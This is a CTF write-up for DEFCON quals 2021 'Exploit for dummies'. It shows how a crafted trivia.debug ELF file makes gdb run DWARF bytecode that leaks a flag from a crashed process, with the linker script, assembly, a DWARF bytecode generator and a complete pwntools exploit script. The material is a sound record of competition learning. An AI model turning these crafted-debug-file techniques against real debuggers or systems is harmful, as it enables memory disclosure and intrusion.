DEFCON quals 2021 - Exploit for dummies challenge writeup

Published on 2021-05-10

Around 10 days ago was DEFCON qualifiers and I had a chance to take a look at the challenges. My eyes stopped on "Exploit for dummies" as I recognised myself in the term "dummy" and hoped I could solve this one.

The challenge was marked as "shellcoding" and believe it or not it will deal with DWARF debugging data format.

A trivia quizz

We are given an ELF binary named trivia which first reads ../../flag and stores it at a random location in memory thanks to a weird request to mmap. After that, it reads the questions.txt file to ask questions from various categories to the player.

When the player reaches a score of 5000, it asks the player to save their name in a file on the filesystem. There are not many checks about the filename, and thus it is possible to trigger a segfault when trying to overwrite the value of a non writable file, e.g. questions.txt, although some checks are done with access. The name itself (which would be stored in the file) is read with the function fgets which reads at most 0x3ff bytes so that means we can write any file in the current directory of size <= 1023 as long as it contains no \n character (which would interrupt the reading of fgets).

When connecting to the remote target, we get the following:

$ nc exploit-for-dummies.challenges.ooo 5000
Ok, listen... here is the deal.
Now I am going to let you interact with a program.
You need to get the flag (that's the goal in a CTF, in case you did not notice that)
But I am here to help you. So, if you make the program crash and you give me the address of
the flag, I am going to get it out of the memory and print it for you.
Isn't it nice?

Ready? Here we go... just press ENTER and I'll spawn the service up for you.

starting...
cd ./tmp/dir_2663717
./trivia
--[ Score: 0 ]--

Secret Passwords for 200:
Super-secure launching code for Nuclear silos during the cold war.

We learn that the wrapper running remotely will handle a crash in the program and give us the memory content at a given address. So we have to gather all the questions, and answer them correctly. Here are the questions followed by their expected answer right below:

OOO is using a log-decay dynamic scoring formula in which the number of teams who solved a challenge is multiplied by which constant?
0.08
He once won a game of Connect Four in three moves, and inspired a Facebook master password
Chuck Norris
Which American group recorded a song named Ooo?
!!!
It was the first trivia question in the 2006 DEF CON quals. It all started like this: "Hack the ...."
planet
The famous president Skroob luggage combination
12345
What is the most common meaning of the OOO abbreviation according to wikipedia?
Out of Office
What was the first year in which OOO organized the defcon CTF?
2018
Level 1 questions make CISSPs turn red, Level 2 make SANS Fellows cry in frustration. We are talking of course of the CTF organized by...
ddtek
He described a penicillin shot in the ass as  "the worst thing that has ever happened to me". He is the one and only..
Kevin Mitnick
Default passwords for IBM 8225 systems
A52896nG93096a
It is 2008. It is the end of the cache as we know it. Or...
64K Should Be Good Enough For Anyone
When David Lightman hacked into the school system to change his grade in Biology 2, the school password was..
pencil
In this year, IDA Pro 5.0 introduced the first GUI.
2006
They took over the Defcon CTF organization in 2002, and defined the game as we all know and love today.
Ghetto Hackers
DNS guru, and the first person Dan called in 2008 to discuss its newly discovered DNS flaw.
Paul Vixie
What is the name of the legitbs 9-bit middle endian architecture?
Clemency
Its three-letter acronym is used by astronomers to indicate double neutron stars
Domain Name System
The name of the university from which he obtained his bachelor's degree.
Santa Clara University
Smashing the Stack for Fun and Profit. We all know it by heart, right? But do you remember its last sentence?
Use the source d00d
In 1992, the Zero Wing videogame shocked the world with the phrase:
All your base are belong to us
Super-secure launching code for Nuclear silos during the cold war.
00000000
In the defcon quals 2020, what was the highest ranked team that had three letters O in its name?
YOKARO-MON
Who (person) was the famous Defcon CTF organizer who said "The Scoring System determines the quality of the game"
Caezar
What was the first column in the first Jeopardy qualification board introduced by Kenshoto in 2006?
Binary L33tness
We are obviously talking about Dan ...
kaminsky

After making a quick and dirty script to answer the questions, we can manage to get asked which file to save, specify we want to overwrite questions.txt and confirm that after crashing the wrapper launches a gdb session with gdb -c core trivia and executes x/s with our provided address. We also learn the address format should start with 0x and be at most 16 characters.

Okay, so what can we do now? After the command is executed, the wrapper finishes and closes the remote connection, so it seems there is no way we can dump multiple addresses. We know we can write a file to the filesystem before triggering a segfault by playing 2 games in a row. We tried to overwrite a file core to make gdb believe we are in another state and somehow manage to do things later on like reading the file from the filesystem directly, as the flag is either stored in the program memory which is dumped in core after the segmentation fault, or in the ../../flag file, but it seemed it would get overwritten by the generated core file. We also tried to overwrite the binary itself so upon invocation of gdb it would have loaded a custom ELF file, but overwriting the file was not possible.

After calling strace on gdb and running it on our binary we can see that it tries to load the file named trivia.debug in the current directory.

$ strace gdb trivia 2>&1 | grep $PWD
...
openat(AT_FDCWD, "/share/trivia", O_RDONLY) = 13
readlink("/share/", 0x7ffc1670f6b0, 1023) = -1 EINVAL (Invalid argum
faccessat2(AT_FDCWD, "/share/", F_OK, AT_EACCESS) = 0
openat(AT_FDCWD, "/share/trivia.debug", O_RDONLY|O_CLOEXEC) = 14)
...

As we can learn from gdb's documentation the .debug files are usually used to store extra debug symbols. The original binary writes the filename in a section named .gnu_debuglink. This section also contains a CRC32 checksum in order to verify that the file being loaded matches what the original binary expects to see.

If I had been more careful, I could have spotted it while checking the sections of the binary:

$ readelf -W -S trivia
...
  [28] .gnu_debuglink    PROGBITS        0000000000000000 00310c 000014 00      0   0  4
...

Okay so that's great, it means we can write an ELF file of at most 1023 bytes named trivia.debug and this file will get loaded by gdb. Well, actually we also have to make sure the CRC matches the one that is hardcoded in the .gnu_debuglink section, but we'll think about that later.

Now my intuition was that I would have the possibility to write a debug symbol that would point directly to some place in memory and dump the flag like this. But well, the flag is allocated and stored at a random position in memory so it seemed not possible, especially since we can only trigger the call to gdb once.

However this debug file thingy reminded me of a step in the SSTIC challenge 2019 that would implement a whole cryptographic algorithm using only DWARF debug information.

Creating custom DWARF information

After I reminded this, I quickly spotted the function dwarf_expr_context::execute_stack_op in gdb source code to confirm that there is indeed a whole virtual machine for DWARF, and tried to find a way to reach it from the x/s command.

That was not easy and at some point I found the amazing DWARF v4 specification which says:

A DWARF procedure is represented by any kind of debugging information entry that has a DW_AT_location attribute.

So I was more confident there would be a way to actually execute code by calling x/s and I started playing around by crafting ELF files.

Crafting small ELF files

First things first, I wanted to make sure my files would fit in 1023 bytes as that would be our goal ultimately. And since I also wanted to manually craft the sections that would contain the DWARF information, I decided to make a linker script that would remove any unused section.

OUTPUT_FORMAT(elf64-x86-64)
SECTIONS
{
  .debug_info : {
    debug_info.o(.debug_info)
  }
  .debug_abbrev : {
    debug_abbrev.o(.debug_abbrev)
  }
  .debug_str : {
    debug_str.o(.debug_str)
  }
  /DISCARD/ : {
    *(.text)
    *(.bss)

    *(.debug_str)
    *(.debug_abbrev)
    *(.debug_info)

    *(.debug_line)
    *(.debug_aranges)
    *(.eh_frame)
    *(.note.gnu.property)
    *(.comment)
  }
}

I even removed the .text section as I didn't plan to execute any code, so in the end only the .symtab, .strtab and .shstrtab sections remained and couldn't be removed with the linker script but that was not an issue as my file was already below 1023 bytes.

The .o files would be simple asm files .s which contain either raw content with .incbin or raw data with .byte or .asciz.

.section .debug_info
.incbin "debug_info.raw"

.section .debug_str
.asciz "mysym"
.byte 0

Understanding DWARF

Thanks to the command objdump -g testfile it was possible to see that the relevant DWARF information are loaded mainly from 3 different sections named .debug_info, .debug_abbrev and .debug_str.

$ objdump -g tiny.o

tiny.o:     file format elf64-x86-64

Contents of the .debug_info section (loaded from tiny.o):

  Compilation Unit @ offset 0x0:
   Length:        0x75 (32-bit)
   Version:       4
   Abbrev Offset: 0x0
   Pointer Size:  8
 <0><b>: Abbrev Number: 1 (DW_TAG_compile_unit)
    <c>   DW_AT_producer    : (indirect string, offset: 0x41): GNU C17 10.2.0 -mtune=generic -march=x86-64 -g -fno-pic -fno-stack-protector
    <10>   DW_AT_language    : 12	(ANSI C99)
    <11>   DW_AT_name        : (indirect string, offset: 0x3a): tiny.c
    <15>   DW_AT_comp_dir    : (indirect string, offset: 0x12): /share/
    <19>   DW_AT_low_pc      : 0x0
    <21>   DW_AT_high_pc     : 0xb
    <29>   DW_AT_stmt_list   : 0x0
 <1><2d>: Abbrev Number: 2 (DW_TAG_enumeration_type)
    <2e>   DW_AT_name        : (indirect string, offset: 0x0): chat
    <32>   DW_AT_encoding    : 7	(unsigned)
    <33>   DW_AT_byte_size   : 4
    <34>   DW_AT_type        : <0x4c>
    <38>   DW_AT_decl_file   : 1
    <39>   DW_AT_decl_line   : 1
    <3a>   DW_AT_decl_column : 6
    <3b>   DW_AT_sibling     : <0x4c>
 <2><3f>: Abbrev Number: 3 (DW_TAG_enumerator)
    <40>   DW_AT_name        : (indirect string, offset: 0x5): first
    <44>   DW_AT_const_value : 51
 <2><45>: Abbrev Number: 3 (DW_TAG_enumerator)
    <46>   DW_AT_name        : (indirect string, offset: 0xb): second
    <4a>   DW_AT_const_value : 52
 <2><4b>: Abbrev Number: 0
 <1><4c>: Abbrev Number: 4 (DW_TAG_base_type)
    <4d>   DW_AT_byte_size   : 4
    <4e>   DW_AT_encoding    : 7	(unsigned)
    <4f>   DW_AT_name        : (indirect string, offset: 0x2d): unsigned int

 [...] ; snip

Contents of the .debug_abbrev section (loaded from tiny.o):

  Number TAG (0x0)
   1      DW_TAG_compile_unit    [has children]
    DW_AT_producer     DW_FORM_strp
    DW_AT_language     DW_FORM_data1
    DW_AT_name         DW_FORM_strp
    DW_AT_comp_dir     DW_FORM_strp
    DW_AT_low_pc       DW_FORM_addr
    DW_AT_high_pc      DW_FORM_data8
    DW_AT_stmt_list    DW_FORM_sec_offset
    DW_AT value: 0     DW_FORM value: 0
   2      DW_TAG_enumeration_type    [has children]
    DW_AT_name         DW_FORM_strp
    DW_AT_encoding     DW_FORM_data1
    DW_AT_byte_size    DW_FORM_data1
    DW_AT_type         DW_FORM_ref4
    DW_AT_decl_file    DW_FORM_data1
    DW_AT_decl_line    DW_FORM_data1
    DW_AT_decl_column  DW_FORM_data1
    DW_AT_sibling      DW_FORM_ref4
    DW_AT value: 0     DW_FORM value: 0
   3      DW_TAG_enumerator    [no children]
    DW_AT_name         DW_FORM_strp
    DW_AT_const_value  DW_FORM_data1
    DW_AT value: 0     DW_FORM value: 0
   4      DW_TAG_base_type    [no children]
    DW_AT_byte_size    DW_FORM_data1
    DW_AT_encoding     DW_FORM_data1
    DW_AT_name         DW_FORM_strp
    DW_AT value: 0     DW_FORM value: 0

 [...] ; snip

Contents of the .debug_str section (loaded from tiny.o):

  0x00000000 63686174 00666972 73740073 65636f6e chat.first.secon
  0x00000010 64002f73 68617265 2f64756d 6d696573 d./share/dummies
  0x00000020 5f776f72 6b005f73 74617274 00756e73 _work._start.uns
  0x00000030 69676e65 6420696e 74007469 6e792e63 igned int.tiny.c
  0x00000040 00474e55 20433137 2031302e 322e3020 .GNU C17 10.2.0
  0x00000050 2d6d7475 6e653d67 656e6572 6963202d -mtune=generic -
  0x00000060 6d617263 683d7838 362d3634 202d6720 march=x86-64 -g
  0x00000070 2d666e6f 2d706963 202d666e 6f2d7374 -fno-pic -fno-st
  0x00000080 61636b2d 70726f74 6563746f 7200     ack-protector.

We understand that the .debug_abbrev section is used to describe some structures or abbrevations, and that the .debug_info contains the actual debugging information which refers to structures from the aforementioned section. The .debug_str is used to contain the debug string information such as variable names, file names, etc.

It means that we can declare any structure in .debug_abbrev with any possible content, and we can refer to the created structure in .debug_info in a way to say "hey there's a debug symbol available of the form that is described in the abbrev section and here is its content".

From there I needed to solve two things:

  1. Generate a symbol that upon printing would execute a DWARF bytecode
  2. Make sure that symbol is reachable from any context

For the first thing, as we briefly mentioned before, creating a DW_TAG_variable with a DW_AT_name pointing to the name I want to give to my symbol, and with a DW_AT_location field allows to execute DWARF bytecode. I can write any DW_OP_xxx opcode in my structure information, and during debugging it would change the value of what x/s mysym would print, or even better yield that my opcode is invalid. But I only managed to make it work when creating a local variable and calling x/s from a context for which the variable was actually reachable.

For the second thing, I realised that using a field with a DW_TAG_enumerator with a DW_AT_const_value attribute would allow me to print it from any context (while the variable is reachable only if the debugger is stopped in its scope). I couldn't find how to enlarge the scope of the variable so I decided to go with the enumerator, however it seemed not compatible with DW_AT_location. When calling x/s mysym it would just say that the symbol does not exist, exactly as with the DW_TAG_variable as seen just before.

After a while I managed to do the following trick which consists in writing in the .debug_info first the DW_TAG_variable with a DW_AT_location attribute pointing to the name mysym and then a second entry DW_TAG_variable with a DW_AT_const_value also pointing to the name mysym. My understanding is that thanks to the second entry, gdb is able to find the symbol when doing x/s mysym (probably thanks to the attribute DW_AT_const_value) but that it will fetch the first occurrence of the symbol (the one with DW_AT_location) when actually getting the value.

It seems easy when written in a few sentences but it took me quite a while to figure this trick out. I'm pretty sure there are smarter ways to do it, but well, the challenge is named "exploit for dummies" after all, so I thought doing so would be completely appropriate.

In the end I came up with the following files:

.section .debug_abbrev
## Type 1
# Type ID
.byte 0x01
# Content
.byte 0x11, 0x01, 0x25, 0x0e, 0x13, 0x0b, 0x03, 0x0e, 0x1b, 0x0e, 0x11, 0x01, 0x12, 0x07, 0x10, 0x17
# End marker
.byte 0x00, 0x00

## Type 3
# Type ID
.byte 0x03
# Field 0 (DW_TAG_variable)
.byte 0x34, 0x00
# Field 1 (DW_AT_name, DW_FORM_strp) string pointer to symbol name
.byte 0x03, 0x0e
# Field 2 (DW_AT_const_value, DW_AT_FORM_data1) constant on 1 byte
.byte 0x1c, 0x0b
# End marker
.byte 0x00, 0x00

## Type 4
# Type ID
.byte 0x04
# Field 0 (DW_TAG_variable)
.byte 0x34, 0x00
# Field 1 (DW_AT_name, DW_FORM_strp) string pointer to symbol name
.byte 0x03, 0x0e
# Field 2 (DW_AT_location, DW_FORM_exprloc) dwarf subprogram to compute location
.byte 0x02, 0x18
# End marker
.byte 0x00, 0x00

# End marker
.byte 0x00

.section .debug_info
# section length
.byte 0x37+SHELLCODE_SIZE, 0x00, 0x00, 0x00
# dwarf version
.byte 0x04, 0x00
# debug_abbrev offset
.byte 0x00, 0x00, 0x00, 0x00
# pointer size
.byte 0x08

### Entries
## Entry 1 (type 1)
# Tag (entry number in .debug_abbrev section)
.byte 0x01
# Data
.byte 0x2d, 0x00, 0x00, 0x00, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x12, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00

## Entry 2 (type 4)
# Tag
.byte 0x04
# String pointer (offset 5 of .debug_str)
.byte 0x05, 0x00, 0x00, 0x00
# Shellcode size
.byte SHELLCODE_SIZE
# Shellcode data
.byte SHELLCODE

## Entry 3 (type 3)
# Tag
.byte 0x03
# String pointer (offset 5 of .debug_str)
.byte 0x05, 0x00, 0x00, 0x00
# Constant value
.byte 0x33

## End marker
.byte 0x00, 0x00

The first entry used as a DW_TAG_compile_unit does not seem useful, but I had troubles with gdb segfaulting when not providing it, so I preferred keeping it.

We will come up to the shellcode part in the next section, however this provides the following debug information:

$ objdump -g trivia.debug

trivia.debug:     file format elf64-x86-64

Contents of the .debug_info section (loaded from trivia.debug):

  Compilation Unit @ offset 0x0:
   Length:        0x75 (32-bit)
   Version:       4
   Abbrev Offset: 0x0
   Pointer Size:  8
 <0><b>: Abbrev Number: 1 (DW_TAG_compile_unit)
    <c>   DW_AT_producer    : (indirect string, offset: 0x2d): GNU C17 10.2.0 -mtune=generic -march=x86-64 -g -fno-stack-protector
    <10>   DW_AT_language    : 12	(ANSI C99)
    <11>   DW_AT_name        : (indirect string, offset: 0x0): chat
    <15>   DW_AT_comp_dir    : (indirect string, offset: 0x12): /share/dummies_work
    <19>   DW_AT_low_pc      : 0x1000
    <21>   DW_AT_high_pc     : 0xb
    <29>   DW_AT_stmt_list   : 0x0
 <1><2d>: Abbrev Number: 4 (DW_TAG_variable)
    <2e>   DW_AT_name        : (indirect string, offset: 0x5): first
    <32>   DW_AT_location    : 2 byte block: 77	0 (DW_OP_breg7 (rsp): 0)
 <1><71>: Abbrev Number: 3 (DW_TAG_variable)
    <72>   DW_AT_name        : (indirect string, offset: 0x5): first
    <76>   DW_AT_const_value : 51
 <1><77>: Abbrev Number: 0

Contents of the .debug_abbrev section (loaded from trivia.debug):

  Number TAG (0x0)
   1      DW_TAG_compile_unit    [has children]
    DW_AT_producer     DW_FORM_strp
    DW_AT_language     DW_FORM_data1
    DW_AT_name         DW_FORM_strp
    DW_AT_comp_dir     DW_FORM_strp
    DW_AT_low_pc       DW_FORM_addr
    DW_AT_high_pc      DW_FORM_data8
    DW_AT_stmt_list    DW_FORM_sec_offset
    DW_AT value: 0     DW_FORM value: 0
   3      DW_TAG_variable    [no children]
    DW_AT_name         DW_FORM_strp
    DW_AT_const_value  DW_FORM_data1
    DW_AT value: 0     DW_FORM value: 0
   4      DW_TAG_variable    [no children]
    DW_AT_name         DW_FORM_strp
    DW_AT_location     DW_FORM_exprloc
    DW_AT value: 0     DW_FORM value: 0

Generating the DWARF shellcode

Now that we can execute dwarf bytecode, we have to figure out where the flag is stored in memory. The code can be summed up like this:

int main() {
  __int64 rand_stack2;          // rbx
  unsigned int v4;              // eax
  int i;                        // [rsp+18h] [rbp-58h]
  int fd;                       // [rsp+1Ch] [rbp-54h]
  char *rand_map;               // [rsp+20h] [rbp-50h]
  __int64 rand_stack;           // [rsp+28h] [rbp-48h] BYREF
  unsigned __int64 mmap_offset; // [rsp+30h] [rbp-40h] BYREF
  unsigned __int64 score;       // [rsp+38h] [rbp-38h]
  unsigned __int64 highscore;   // [rsp+40h] [rbp-30h]
  fdata *heapvar;               // [rsp+48h] [rbp-28h]
  FILE *stream;                 // [rsp+50h] [rbp-20h]
  unsigned __int64 canary;      // [rsp+58h] [rbp-18h]*

  canary = __readfsqword(0x28u);
  heapvar = (fdata *)malloc(0x18uLL);
  rand_map = (char *)mmap_random(0x4C4B40uLL);
  score = 0LL;
  highscore = 5000LL;
  byte_4045FF = 0;

  fd = open("/dev/urandom", 0);
  read(fd, &rand_data, 8uLL);
  read(fd, &rand_stack, 8uLL);
  read(fd, &heapvar->rand_heap, 8uLL);
  read(fd, &mmap_offset, 3uLL);
  mmap_offset %= 0x4C4B1CuLL;

  stream = fopen("../../flag", "r");
  setvbuf(stream, 0LL, 2, 0LL);
  fgets(&rand_map[mmap_offset], 36, stream);
  rand_map[mmap_offset + 36] = 0;
  fclose(stream);

  rand_stack2 = heapvar->rand_heap ^ rand_stack ^ rand_data ^ (unsigned __int64)&rand_map[mmap_offset];
  mmap_offset = -1LL;

  // Start the quizz
  read_questions();
  rand_swap((__int64 *)questions, 25uLL);
  while (1) {
    // ... (snip)
  }

  return __readfsqword(0x28u) ^ canary;
}

We figure that the flag is stored at &rand_map[mmap_offset] which is a random location in the memory, but we are provided variables in different locations in the memory which once xored together could leak the flag position.

  rand_stack2 = heapvar->rand_heap ^ rand_stack ^ rand_data ^ &rand_map[mmap_offset]

Is equivalent to:

  &rand_map[mmap_offset] = heapvar->rand_heap ^ rand_stack ^ rand_data ^ rand_stack2

Thanks to gdb we can spot their exact location in memory at the moment of the crash, and write a small shellcode to retrieve it:

#!/usr/bin/env python3
import struct


def gen_file(sc):
  data = open('debug_info.s', 'r').read()
  data = data.replace('SHELLCODE_SIZE', str(len(sc)))
  data = data.replace('SHELLCODE', ', '.join(map(hex, sc)))
  open('debug_info.gen.s', 'w').write(data)


DW_OP_const1u     = 0x08
DW_OP_const2u     = 0x0a
DW_OP_const4u     = 0x0c
DW_OP_const8u     = 0x0e

DW_OP_dup         = 0x12

DW_OP_or          = 0x21
DW_OP_plus        = 0x22
DW_OP_shl         = 0x24
DW_OP_shr         = 0x25
DW_OP_xor         = 0x27

DW_OP_deref       = 0x06
DW_OP_reg7        = 0x57 # rsp
DW_OP_breg7       = 0x77 # rsp
DW_OP_piece       = 0x93
DW_OP_stack_value = 0x9f
DW_OP_push_object_address = 0x97

# Shellcode starts here
sc = []

# Get the 3rd random value in the heap at [[rsp + 8*23] + 0x10]
sc += [DW_OP_breg7, 0x00]
sc += [DW_OP_const1u, 8 * 23]
sc += [DW_OP_plus]
sc += [DW_OP_deref]
sc += [DW_OP_const1u, 8 * 2]
sc += [DW_OP_plus]
sc += [DW_OP_deref]

# Get the 2nd random value at [rsp + 8*19]
sc += [DW_OP_breg7, 0x00]
sc += [DW_OP_const1u, 8 * 19]
sc += [DW_OP_plus]
sc += [DW_OP_deref]

# xor them
sc += [DW_OP_xor]

# Get the 1st random value at offset 0x404100 in .data
sc += [DW_OP_const8u, 0x00, 0x41, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00]
sc += [DW_OP_deref]

# xor them
sc += [DW_OP_xor]

# Get the last value at [rsp]
sc += [DW_OP_breg7, 0x00]
sc += [DW_OP_const1u, 0]
sc += [DW_OP_plus]
sc += [DW_OP_deref]

# xor them
sc += [DW_OP_xor]

# get the address
sc += [DW_OP_stack_value]

gen_file(sc)

This looks great but while trying locally I stumbled on an issue where using the DW_OP_stack_value which uses the value on the top of the stack as the address would actually sign extend it and retrieve something as 0xffffffff41424344 for the flag address. I couldn't get rid of this and thus did not manage to have a successful x/s working and printing the entire flag as a string.

However, if we remove DW_OP_stack_value from our shellcode, x/s will leak the first 4 bytes of the flag, and thus we can simply repeat the operation by incrementing the pointer 4 by 4 (and I'm happy there are only 36 bytes to leak):

sc += [DW_OP_const1u, 4]
sc += [DW_OP_plus]

Executing remotely

Now we're ready, we can make sure our file does not contain any \n character and send it remotely. We quickly realise that the CRC does not match. Of course, we have to patch the CRC to the one that was hardcoded in the trivia binary i.e. 3d46c53b. For that I used this script which would allow me to force a CRC32 for my input file (kudos to burrito, it is indeed faster than bruteforcing like a dummy).

Tried it again, and whoops, it still didn't work. And for a good reason, after fgets is called, the character \n is added to the content of our file followed by the player's score divided by 0x64! So I had to append my current score to the file first, force its CRC to the one we wanted, then remove it again so that the CRC matches when the remote binary appends our score to the file.

Here's my not-so-pretty but working script:

#!/usr/bin/env python3

from pwn import *
import struct
import binascii
import forcecrc32

answers = {}
def readquestions():
    data = open('questions.txt', 'rb').read()
    data = data.decode('utf-8').split("\n")
    for x in range(int(len(data)/2)):
        q = data[x*2]
        a = data[x*2+1]
        answers[q] = a

last_score = 0

def question(minscore, fail=False):
    global last_score
    line = r.recvline()
    if line == b'\n':
        return False
    try:
        score = int(line.split(b':')[1].split()[0].decode())
        last_score = score
    except:
        print(line)
        return False
    r.recvuntil(':\n')
    q = r.recvline().decode().strip() # question
    if not fail and q in answers:
        answer = answers[q]
    else:
        answer = 'UNK'
    r.send(answer + '\n')
    r.recvline()
    r.recvline()
    res = r.recvline()
    if b'WRONG' in res and not fail:
        print(f'Wrong answer for "{q}" (sent "{answer}")')
    r.send('\n')
    return score <= minscore or fail

# Init answers and socket
readquestions()
r = remote('exploit-for-dummies.challenges.ooo', 5000)
r.recvuntil('spawn the service up for you.\n')
r.send('\n')
print(r.recvline()) # starting...
print(r.recvline()) # cd
print(r.recvline()) # ./trivia

# Answer correctly to questions
def play(score=5000):
    run = True
    while run:
        run = question(score)

    # Minimum score is reached, abort asap
    run = True
    while run:
        run = question(score, True)

def save_score(name, data):
    r.recvuntil('save your score? (yes/no)\n')
    r.sendline('yes')
    r.sendlineafter('Name:', name)
    if name == 'questions.txt':
        return
    r.recvuntil('Your Name')
    print('CRC:', hex(binascii.crc32(data)), len(data))
    # \n included in data for CRC match
    assert data[-1] == 0x0a
    x = r.send(data)
    print('Sent', x)
    r.sendlineafter('play again? (yes/no)\n', 'yes')

# Now make it segfault and send data
def dump(payload):
    save_score('questions.txt', None)
    r.sendlineafter('continue', '')
    r.sendlineafter('input', '')
    r.sendlineafter('Address', payload)
    r.interactive()

    print(r.recvuntil('x/s ' + payload + '\n'))
    gdb_data = r.recvuntil(payload + ':')
    addr = r.recvline()
    print(gdb_data.decode(), end='')
    print(addr.decode())
    print(r.recvline())


### 
score = play()
print('your score is', last_score)
score = last_score // 0x64
data = open('./trivia.debug', 'rb').read()
data = data + int.to_bytes(score, 1, 'big')
open('./trivia.debug.sent', 'wb').write(data)
__import__('os').system('python3 forcecrc32.py ./trivia.debug.sent 304 3d46c53b') # I'm not proud but that's how I did it
save_score('trivia.debug', open('./trivia.debug.sent', 'rb').read()[:-1])
play(last_score)
dump('0x0+first') # Leak the symbol 'first'

Et voilà! After a while we can see the following:

...
warning: section .bss not found in /home/dummies/tmp/dir_4912804/trivia.debug
[New LWP 37]
Core was generated by `./trivia'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x00007fc068c97f5b in _IO_new_fclose (fp=0x0) at iofclose.c:48
48    iofclose.c: No such file or directory.
(gdb) 0x7b4f4f4f:    <error: Cannot access memory at address 0x7b4f4f4f>

And as you would have guessed already, 0x7b4f4f4f in little-endian corresponds to the characters OOO{ which is the mark of the beginning of the flag. All I had to do now was to adjust the shellcode to read the bytes 4 by 4 until the full flag is leaked:

p32 = lambda x: struct.pack('<I', x)
flag = b'OOO{' + p32(0x72617764) + p32(0x68732066) + p32(0x636c6c65) + p32(0x7365646f) + p32(0x65726120) + p32(0x72657620) + p32(0x656c2079) + p32(0x7d7465)
print(flag)

OOO{dwarf shellcodes are very leet}

Conclusion

I found this challenge very interesting as I learned a lot about the capabilities of DWARF. It still amazes me how complex this language is and all the things one can do with it.

I'd like to thank yrp, grimmlin, burrito and clz for their help during this challenge and the time they spent helping a dummy.